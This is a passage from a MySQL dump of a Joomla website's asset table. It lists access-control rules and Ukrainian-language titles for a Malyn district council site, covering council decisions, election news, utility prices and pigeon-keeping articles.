/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_assets` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key',
  `parent_id` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set parent.',
  `lft` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set lft.',
  `rgt` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set rgt.',
  `level` int(10) unsigned NOT NULL COMMENT 'The cached level in the nested tree.',
  `name` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The unique name for the asset.\n',
  `title` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The descriptive title for the asset.',
  `rules` varchar(5120) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'JSON encoded access control.',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_asset_name` (`name`),
  KEY `idx_lft_rgt` (`lft`,`rgt`),
  KEY `idx_parent_id` (`parent_id`)
) ENGINE=InnoDB AUTO_INCREMENT=2971 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_assets`
--

LOCK TABLES `fw3gt_assets` WRITE;
/*!40000 ALTER TABLE `fw3gt_assets` DISABLE KEYS */;
INSERT INTO `fw3gt_assets` VALUES (1,0,1,517,0,'root.1','Root Asset','{\"core.login.site\":{\"6\":1,\"2\":1},\"core.login.admin\":{\"6\":1},\"core.login.offline\":{\"6\":1},\"core.admin\":{\"8\":1},\"core.manage\":{\"7\":1},\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1},\"attachments.delete.own\":{\"6\":1,\"3\":1},\"attachments.edit.state.own\":{\"6\":1,\"4\":1},\"attachments.edit.state.ownparent\":{\"6\":1,\"4\":1},\"attachments.edit.ownparent\":{\"6\":1,\"3\":1},\"attachments.delete.ownparent\":{\"6\":1,\"3\":1}}'),(2,1,1,2,1,'com_admin','com_admin','{}'),(3,1,3,6,1,'com_banners','com_banners','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(4,1,7,8,1,'com_cache','com_cache','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(5,1,9,10,1,'com_checkin','com_checkin','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(6,1,11,12,1,'com_config','com_config','{}'),(7,1,13,16,1,'com_contact','com_contact','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(8,1,17,386,1,'com_content','com_content','{\"core.admin\":{\"7\":1},\"core.options\":[],\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),(9,1,387,388,1,'com_cpanel','com_cpanel','{}'),(10,1,389,390,1,'com_installer','com_installer','{\"core.admin\":[],\"core.manage\":{\"7\":0},\"core.delete\":{\"7\":0},\"core.edit.state\":{\"7\":0}}'),(11,1,391,392,1,'com_languages','com_languages','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(12,1,393,394,1,'com_login','com_login','{}'),(13,1,395,396,1,'com_mailto','com_mailto','{}'),(14,1,397,398,1,'com_massmail','com_massmail','{}'),(15,1,399,400,1,'com_media','com_media','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":{\"5\":1}}'),(16,1,401,402,1,'com_menus','com_menus','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(17,1,403,404,1,'com_messages','com_messages','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(18,1,405,458,1,'com_modules','com_modules','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(19,1,459,462,1,'com_newsfeeds','com_newsfeeds','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(20,1,463,464,1,'com_plugins','com_plugins','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(21,1,465,466,1,'com_redirect','com_redirect','{\"core.admin\":{\"7\":1},\"core.manage\":[]}'),(22,1,467,468,1,'com_search','com_search','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1}}'),(23,1,469,470,1,'com_templates','com_templates','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(24,1,471,478,1,'com_users','com_users','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(25,1,479,482,1,'com_weblinks','com_weblinks','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),(26,1,483,484,1,'com_wrapper','com_wrapper','{}'),(27,8,18,19,2,'com_content.category.2','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(28,3,4,5,2,'com_banners.category.3','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(29,7,14,15,2,'com_contact.category.4','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(30,19,460,461,2,'com_newsfeeds.category.5','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(31,25,480,481,2,'com_weblinks.category.6','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(32,24,472,473,1,'com_users.category.7','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(33,1,485,486,1,'com_finder','com_finder','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1}}'),(34,1,487,488,1,'com_joomlaupdate','com_joomlaupdate','{\"core.admin\":[],\"core.manage\":[],\"core.delete\":[],\"core.edit.state\":[]}'),(36,8,20,133,2,'com_content.category.8','головна','{}'),(37,8,134,145,2,'com_content.category.9','Відомості про район',''),(40,37,135,136,3,'com_content.category.12','Істричний нарис',''),(42,37,137,138,3,'com_content.category.14','Відеоогляд',''),(43,37,139,140,3,'com_content.category.15','Малинщина та Голодомор 1932-33 рр.',''),(44,8,146,175,2,'com_content.category.16','Депутатська сторінка',''),(45,44,147,148,3,'com_content.category.17','Депутати райради',''),(46,44,149,150,3,'com_content.category.18','Регламент ради',''),(47,44,151,152,3,'com_content.category.19','Президія ради',''),(48,44,153,154,3,'com_content.category.20','Керівництво ради',''),(49,44,155,156,3,'com_content.category.21','Виконавчий апарат',''),(50,44,157,158,3,'com_content.category.22','Звітність',''),(51,44,159,160,3,'com_content.category.23','Звернення громадян',''),(52,44,161,162,3,'com_content.category.24','Закони України',''),(53,44,163,164,3,'com_content.category.25','Положення',''),(54,44,165,166,3,'com_content.category.26','Регуляторні акти',''),(55,44,167,168,3,'com_content.category.27','Публічна інформація',''),(56,8,176,259,2,'com_content.category.28','Рішення ради',''),(57,56,177,256,3,'com_content.category.29','Рішення',''),(88,44,169,170,3,'com_content.category.60','Постійні комісії','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(89,8,260,267,2,'com_content.category.61','Органи місцевого самоврядування',''),(189,36,21,22,3,'com_content.article.100','Замальовки Малина у виконанні Миклухо-Маклая',''),(865,36,23,24,3,'com_content.article.776','Веб-камера в центрі Малина',''),(946,24,474,475,2,'com_users.category.62','Проекти рішень','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(967,8,268,269,2,'com_content.category.64','адміністратор сайту','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(973,56,257,258,3,'com_content.category.65','Проекти рішень','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(1155,36,25,26,3,'com_content.article.901','Результати по одномандатному виборчому округу № 66','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(1156,36,27,28,3,'com_content.article.902','Результати партій по округу № 66','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(1157,36,29,30,3,'com_content.article.903','Позачергові вибори народних депутатів України 26 жовтня 2014 року','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(1209,44,171,172,3,'com_content.category.70','Очищення влади','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(1293,36,31,32,3,'com_content.article.1033','Відкриття музею М.М.Миклухи-Маклаю в с.Гамарня','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(1463,57,178,179,4,'com_content.category.77','Рішення від 06.11.2015 року','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(1488,89,265,266,3,'com_content.article.1223','ЦВК: офіційні дані по місту Малину','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(1489,89,261,262,3,'com_content.article.1224','Інформує ЦВК: вибори сільських та селищних голів району','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(1490,89,263,264,3,'com_content.article.1225','ЦВК: офіційні дані по Малинській міській раді','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(1513,57,180,181,4,'com_content.category.78','Рішення від 13.11.2015 року','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(1561,36,33,34,3,'com_content.article.1295','ВИСТАВКА РОБІТ ПРАЦІВНИКІВ УПРАВЛІННЯ ПФУ В МАЛИНСЬКОМУ РАЙОНІ, ПРИСВЯЧЕНА 25 РІЧЧЮ ЗАСНУВАННЯ ПЕНСІ','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(1563,1,489,490,1,'com_tags','com_tags','{}'),(1564,1,491,492,1,'com_contenthistory','com_contenthistory','{}'),(1565,1,493,494,1,'com_ajax','com_ajax','{}'),(1566,1,495,496,1,'com_postinstall','com_postinstall','{}'),(1567,1,497,498,1,'com_attachments','com_attachments','{}'),(1571,57,182,183,4,'com_content.category.79','Рішення від 23.12.2015 року','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(1603,1,499,500,1,'com_jce','JCE','{}'),(1608,37,141,142,3,'com_content.category.81','Почесні громадяни району','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(1609,37,143,144,3,'com_content.category.82','Фотогалерея','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(1611,18,406,407,2,'com_modules.module.126','бігуща строка','{}'),(1616,18,408,409,2,'com_modules.module.131','Translate','{}'),(1617,18,410,411,2,'com_modules.module.120','Погода','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(1624,1,501,502,1,'com_xmap','com_xmap','{}'),(1640,57,184,185,4,'com_content.category.83','Рішення від 15.01.2016 року','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(1643,36,35,36,3,'com_content.article.1346','За матеріалами ТРС \"ПОЛІССЯ\"','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(1648,1,503,504,1,'com_akeeba','Akeeba','{}'),(1650,18,412,413,2,'com_modules.module.140','ZT Visitor Counter module','{}'),(1699,57,186,187,4,'com_content.category.84','Рішення від 25.03.2016 року','{}'),(1711,36,37,38,3,'com_content.article.1408','Центр Малина з висоти пташиного польоту в подачі Анатолія Ястремського','{\"core.admin\":{\"7\":1},\"core.options\":[],\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),(1733,57,188,189,4,'com_content.category.85','Рішення від 22.04.2016 року','{}'),(1748,57,190,191,4,'com_content.category.86','Рішення від 13.05.2016 року','{}'),(1756,44,173,174,3,'com_content.category.87','Інформування щодо конкурсів','{}'),(1780,36,39,40,3,'com_content.article.1472','Малин з висоти пташиного польоту в подачі Олександра Скуратівського','{\"core.admin\":{\"7\":1},\"core.options\":[],\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),(1812,57,192,193,4,'com_content.category.88','Рішення від 22.07.2016 року','{}'),(1836,57,194,195,4,'com_content.category.89','Рішення від 31.08.2016 року','{}'),(1843,18,414,415,2,'com_modules.module.142','Радіо','{}'),(1884,57,196,197,4,'com_content.category.90','Рішення від 21.10.2016 року','{}'),(1891,57,198,199,4,'com_content.category.91','Рішення від 26.10.2016 року','{}'),(1899,57,200,201,4,'com_content.category.92','Рішення від 09.11.2016 року','{}'),(1926,57,202,203,4,'com_content.category.93','Рішення від 07.12.2016 року','{}'),(1947,57,204,205,4,'com_content.category.94','Рішення від 21.12.2016 року','{}'),(1957,57,206,207,4,'com_content.category.95','Рішення від 27.12.2016 року','{}'),(2010,57,208,209,4,'com_content.category.96','Рішення від 17.03.2017 року','{}'),(2020,57,210,211,4,'com_content.category.97','Рішення від 22.03.2017 року','{}'),(2043,1,505,506,1,'com_fields','com_fields','{}'),(2044,1,507,508,1,'com_associations','com_associations','{}'),(2076,57,212,213,4,'com_content.category.98','Рішення від 16.06.2017 року','{}'),(2109,57,214,215,4,'com_content.category.99','Рішення від 28.07.2017 року','{}'),(2121,57,216,217,4,'com_content.category.100','Рішення від 09.08.2017 року','{}'),(2160,57,218,219,4,'com_content.category.101','Рішення від 27.10.2017 року','{}'),(2210,57,220,221,4,'com_content.category.102','Рішення від 15.12.2017 року','{}'),(2241,18,416,417,2,'com_modules.module.1','Main Menu','{}'),(2242,18,418,419,2,'com_modules.module.101','Інформаційне меню','{}'),(2250,57,222,223,4,'com_content.category.103','Рішення від 02.02.2018 року','{}'),(2254,18,420,421,2,'com_modules.module.17','Breadcrumbs','{}'),(2255,18,422,423,2,'com_modules.module.143','Пошук по сайту','{}'),(2310,57,224,225,4,'com_content.category.104','Рішення від 23.03.2018 року','{}'),(2374,57,226,227,4,'com_content.category.105','Рішення від 15.06.2018 року','{}'),(2406,57,228,229,4,'com_content.category.106','Рішення від 10.08.2018 року','{}'),(2440,57,230,231,4,'com_content.category.107','Рішення від 26.10.2018 року','{}'),(2444,18,424,425,2,'com_modules.module.121','Календар','{}'),(2452,1,509,510,1,'com_privacy','com_privacy','{}'),(2453,1,511,512,1,'com_actionlogs','com_actionlogs','{}'),(2454,18,426,427,2,'com_modules.module.154','Курси валют','{}'),(2455,18,428,429,2,'com_modules.module.102','КОНТАКТИ','{}'),(2459,18,430,431,2,'com_modules.module.158','Слайди - Малин','{}'),(2460,18,432,433,2,'com_modules.module.159','Слайди - фотогалерея','{}'),(2461,18,434,435,2,'com_modules.module.87','ОСТАННІ НОВИНИ','{}'),(2505,57,232,233,4,'com_content.category.108','Рішення від 14.12.2018 року','{}'),(2510,18,436,437,2,'com_modules.module.163','новорічна мотня','{}'),(2516,18,438,439,2,'com_modules.module.167','Ялинка','{}'),(2525,18,440,441,2,'com_modules.module.169','BT Content Slider_слайдер','{}'),(2554,8,270,271,2,'com_content.category.109','Паспорти бюджетних програм','{}'),(2561,57,234,235,4,'com_content.category.110','Рішення від 22.02.2019 року','{}'),(2583,57,236,237,4,'com_content.category.111','Рішення від 22.03.2019 року','{}'),(2611,57,238,241,4,'com_content.category.112','Рішення від 14.06.2019 року','{}'),(2612,2611,239,240,5,'com_content.category.113','Рішення від 14.06.2019 року','{}'),(2654,57,242,243,4,'com_content.category.114','Рішення від 18.10.2019 року','{}'),(2700,57,244,245,4,'com_content.category.115','Рішення від 11.12.2019 року','{}'),(2736,57,246,247,4,'com_content.category.116','Рішення від 17.02.2020 року','{}'),(2743,1,513,514,1,'com_gsd','GSD','{}'),(2747,57,248,249,4,'com_content.category.117','Рішення від 26.02.2020 року','{}'),(2762,57,250,251,4,'com_content.category.118','Рішення від 08.04.2020 року','{}'),(2789,57,252,253,4,'com_content.category.119','Рішення від 16.06.2020 року','{}'),(2812,57,254,255,4,'com_content.category.120','Рішення від 12.08.2020 року','{}'),(2816,8,272,273,2,'com_content.category.121','Запобігання проявам корупції','{}'),(2830,8,274,281,2,'com_content.category.122','Садівництво','{}'),(2831,2830,275,278,3,'com_content.category.123','Засоби захисту','{}'),(2832,2830,279,280,3,'com_content.category.124','Догляд ','{}'),(2833,8,282,367,2,'com_content.category.125','Голуби','{}'),(2834,2833,283,308,3,'com_content.category.126','Поштові','{}'),(2835,2833,309,320,3,'com_content.category.127','Кінги','{}'),(2836,2833,321,330,3,'com_content.category.128','Павліни (павичі)','{}'),(2837,8,368,371,2,'com_content.category.129','Контакти','{}'),(2838,8,372,373,2,'com_content.category.130','Оголошення','{}'),(2839,18,442,443,2,'com_modules.module.170','SP Portfolio','{}'),(2840,18,444,445,2,'com_modules.module.171','SP Simple Youtube','{}'),(2841,18,446,447,2,'com_modules.module.172','Vina Animations Image Slider','{}'),(2846,2861,375,376,3,'com_content.category.131','Фотогалерея','{}'),(2851,2836,322,323,4,'com_content.article.2449','Пара молодих чорних павлінів','{}'),(2852,2836,324,325,4,'com_content.article.2450','Білі павліни','{}'),(2853,2836,326,327,4,'com_content.article.2451','Чорнохвоста самка павліна','{}'),(2854,2834,284,285,4,'com_content.article.2452','Голуб поштовий самка','{}'),(2855,2835,310,311,4,'com_content.article.2453','У павлінів та кінгів банний день','{}'),(2856,2831,276,277,4,'com_content.article.2454','Календарний план догляду за садом','{}'),(2857,24,476,477,2,'com_users.category.132','qqq','{}'),(2860,2837,369,370,3,'com_content.article.2455','контактна інформація','{}'),(2861,8,374,385,2,'com_content.category.133','Фото та відео','{}'),(2862,2861,377,384,3,'com_content.category.134','Відео','{}'),(2863,2862,378,379,4,'com_content.article.2456','Процик Ілля Дмитрович - мій дідусь, знав секрет довголіття та любив розповідати народні байки','{}'),(2864,18,448,449,2,'com_modules.module.174','новини','{}'),(2873,2833,331,352,3,'com_content.category.135','Інформація голубівникам','{}'),(2874,2873,332,333,4,'com_content.article.2457','\"Біомікс\" премікс для голубів вітамінний','{}'),(2875,2873,334,335,4,'com_content.article.2458','Тімокс - комплексний препарат','{}'),(2876,2873,336,337,4,'com_content.article.2459','Вітамінний комплекс НУТРІФАРМ','{}'),(2877,2873,338,339,4,'com_content.article.2460','Тілоциклін - антибактеріальний препарат для системного застосування','{}'),(2878,2873,340,341,4,'com_content.article.2461','Празіфен - глистогінний препарат','{}'),(2879,2873,342,343,4,'com_content.article.2462','Метронідазол 20 % (для голубів)','{}'),(2880,1,515,516,1,'com_phocagallery','com_phocagallery','{}'),(2881,2873,344,345,4,'com_content.article.2463','Івермікол для голубів (краплі)','{}'),(2882,2873,346,347,4,'com_content.article.2464','Апраміцин 100 г Huvepharma (Болгарія)','{}'),(2883,2873,348,349,4,'com_content.article.2465','Лікування та профілактика інфекційних захворювань в голубів','{}'),(2884,18,450,451,2,'com_modules.module.182','Phoca Gallery Image Module(Малинщина)','{}'),(2885,18,452,453,2,'com_modules.module.183','Phoca Gallery Image Module (поштові голуби)','{}'),(2886,2834,286,287,4,'com_content.article.2466','Молоді поштові голуби','{}'),(2887,2834,288,289,4,'com_content.article.2467','Молоді поштові білі','{}'),(2888,18,454,455,2,'com_modules.module.184','Phoca Gallery Image Module (поштові білі голуби) ','{}'),(2889,36,41,42,3,'com_content.article.2468','Інформація про кількість виборців, які мають право голосу на виборах депутатів міської, сільської, с','{}'),(2890,36,43,44,3,'com_content.article.2469','В Житомирській області утворено 8 виборчих округів','{}'),(2891,36,45,46,3,'com_content.article.2470','Виборчі округи по виборах до Малинської міської ради','{}'),(2893,36,47,48,3,'com_content.article.2472','Незабаром нові реалії Малинщини','{}'),(2894,36,49,50,3,'com_content.article.2473','Малинський міський краєзнавчий музей: Туристична мандрівка Малином','{}'),(2896,36,51,52,3,'com_content.article.2475','Зареєстровано 352 кандидати на 34 депутатських мандати у Малинську міську раду Коростенського району','{}'),(2897,36,53,54,3,'com_content.article.2476','Список кандидатів у депутати до Малинської міської ради по округах','{}'),(2898,36,55,56,3,'com_content.article.2477','ЦВК: Як правильно заповнити виборчий бюлетень?','{}'),(2899,36,57,58,3,'com_content.article.2478','\"Атлас адміністративно-територіального устрою України\"','{}'),(2900,36,59,60,3,'com_content.article.2479','14 жовтня – свято Покрови Пресвятої Владичиці нашої Богородиці та Приснодіви Марії','{}'),(2901,36,61,62,3,'com_content.article.2480','14 жовтня - День захисника України','{}'),(2902,36,63,64,3,'com_content.article.2481','Виконання дохідної частини бюджетів міст, районів та ОТГ за 9 місяців 2020 року','{}'),(2903,2862,380,381,4,'com_content.article.2482','Оркестр \"Малин\"- коротка історія ( архівні матеріали)','{}'),(2904,36,65,66,3,'com_content.article.2483','Марія Насіканова: «Я не збираюсь піаритись на порожніх обіцянках, а працювати так, щоб люди у малинс','{}'),(2905,36,67,68,3,'com_content.article.2484','5293 виборці із 11164, які взяли участь у голосуванні 25.10.2020 року, віддали свій голос за Ситайла','{}'),(2906,36,69,70,3,'com_content.article.2485','Вартість природного газу в листопаді 2020 року в розрізі постачальників','{}'),(2907,36,71,72,3,'com_content.article.2486','Депутати Чоповицької селищної ради ','{}'),(2908,36,73,74,3,'com_content.article.2487','Депутати Малинської міської ради ','{}'),(2909,2834,290,291,4,'com_content.article.2488','Поштові голуби.','{}'),(2910,2835,312,313,4,'com_content.article.2489','Кінги 20 року','{}'),(2911,18,456,457,2,'com_modules.module.185','Phoca Gallery Image Module (поштові голуби_грудень 20)','{}'),(2912,36,75,76,3,'com_content.article.2490','Останні осінні дні в Малині','{}'),(2913,36,77,78,3,'com_content.article.2491','Останні ( вже історичні матеріали) щодо виконання дохідної частини бюджетів міст, районів та ОТГ за ','{}'),(2914,36,79,80,3,'com_content.article.2492','21 грудня 2020','{}'),(2915,36,81,82,3,'com_content.article.2493','З Новим 2021 роком!','{}'),(2916,2833,353,358,3,'com_content.category.136','Померанські дутиші','{}'),(2917,2916,354,355,4,'com_content.article.2494','Сніданок в новому році','{}'),(2918,36,83,84,3,'com_content.article.2495','Радісних Різдвяних Свят!','{}'),(2919,36,85,86,3,'com_content.article.2496','Що повинно бути на столі на СВЯТ-ВЕЧІР','{}'),(2920,36,87,88,3,'com_content.article.2497','Малин напередодні Різдва','{}'),(2921,36,89,90,3,'com_content.article.2498','Ціни на природний газ в січні 2021 року','{}'),(2922,2873,350,351,4,'com_content.article.2499','Лозеваль противовірусний препарат','{}'),(2923,2834,292,293,4,'com_content.article.2500','Перші поштові 2021 року','{}'),(2924,36,91,92,3,'com_content.article.2501','«Газова грамота»: як змінити постачальника газу і скільки часу це займає?','{}'),(2925,36,93,94,3,'com_content.article.2502','Кращі виступи дітей в Голос Діти ','{}'),(2926,2834,294,295,4,'com_content.article.2503','Підростають молоді поштові - годую вручну, вже 3 березня 2021 року ','{}'),(2927,2916,356,357,4,'com_content.article.2504','Починається масове будівництво гнізд ','{}'),(2928,36,95,96,3,'com_content.article.2505','Із святом весни, краси та любові!','{}'),(2929,2834,296,297,4,'com_content.article.2506','Поштові голуби, пройшло ще 10 днів- 14 березня і перший пробний політ..','{}'),(2930,2834,298,299,4,'com_content.article.2507','Перші поштові 2021 року- експеримент вийшов на фінішну пряму- 21 березня 2021 року перший самостійни','{}'),(2931,36,97,98,3,'com_content.article.2508','Результати за 3 місяці 2021 року','{}'),(2940,2835,314,315,4,'com_content.article.2517','Голуб кінг','{}'),(2941,2835,316,317,4,'com_content.article.2518','Кінг самочка осіння','{}'),(2942,36,99,100,3,'com_content.article.2519','Річна фіксована ціна на газ уже виправдовує себе','{}'),(2943,36,101,102,3,'com_content.article.2520','Виконання дохідної частини бюджетів ОТГ Житомирської області за 5 місяців 2021 року','{}'),(2944,2834,300,301,4,'com_content.article.2521','Молоді поштові готові поміняти прописку','{}'),(2945,2835,318,319,4,'com_content.article.2522','Шоколадна парочка поміняє прописку','{}'),(2946,2834,302,303,4,'com_content.article.2523','Поштові молоді ','{}'),(2947,36,103,104,3,'com_content.article.2524','Україна – Англія: де дивитися матч чемпіонату Європи-2020','{}'),(2948,36,105,106,3,'com_content.article.2525','До відома пенсіонерів чорнобильців','{}'),(2949,36,107,108,3,'com_content.article.2526','09 липня 2021 - куди далі?','{}'),(2950,36,109,110,3,'com_content.article.2527','Ентоні Гопкінс не тільки актор світового рівня, але й автор шикарного вальсу','{}'),(2951,36,111,112,3,'com_content.article.2528','Змінити постачальника газу тепер можна через «Дію»','{}'),(2952,36,113,114,3,'com_content.article.2529','Виконання дохідної частини бюджетів ОТГ Житомирської області за перше півріччя 2021 року','{}'),(2953,36,115,116,3,'com_content.article.2530','Вартість електроенергії з 1 жовтня 21 року','{}'),(2954,2834,304,305,4,'com_content.article.2531','Зарядка перед сніданком','{}'),(2955,2834,306,307,4,'com_content.article.2532','Сніданок поштових голубів','{}'),(2956,36,117,118,3,'com_content.article.2533','З Днем Незалежності України!','{}'),(2957,36,119,120,3,'com_content.article.2534','Малину - 1130 років','{}'),(2958,36,121,122,3,'com_content.article.2535','30 вересня 2021 року – останній день поточного газового року','{}'),(2959,36,123,124,3,'com_content.article.2536','Що робити, якщо облгаз не враховує показники вашого лічильника й вимагає сплатити за «зайві» куби?','{}'),(2961,36,125,126,3,'com_content.article.2538','Просто шедевральний новорічний салют','{}'),(2962,2833,359,366,3,'com_content.category.137','Адана турецька','{}'),(2963,2962,360,361,4,'com_content.article.2539','Посадка турецької адани','{}'),(2964,2962,362,363,4,'com_content.article.2540','Моя пара - подарок від OBLAKO','{}'),(2965,2962,364,365,4,'com_content.article.2541','Турецька адана','{}'),(2966,36,127,128,3,'com_content.article.2542','Виконання дохідної частини бюджетів ОТГ Житомирської області за 2021 рік','{}'),(2967,36,129,130,3,'com_content.article.2543','Безпечне місто Малин','{}'),(2968,36,131,132,3,'com_content.article.2544','Вечірнє небо над Малином','{}'),(2969,2836,328,329,4,'com_content.article.2545','Пора на сніданок','{}'),(2970,2862,382,383,4,'com_content.article.2546','З Днем Соборності України!','{}');
/*!40000 ALTER TABLE `fw3gt_assets` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_associations`
--

DROP TABLE IF EXISTS `fw3gt_associations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_associations` (
  `id` int(11) NOT NULL COMMENT 'A reference to the associated item.',
  `context` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The context of the associated item.',
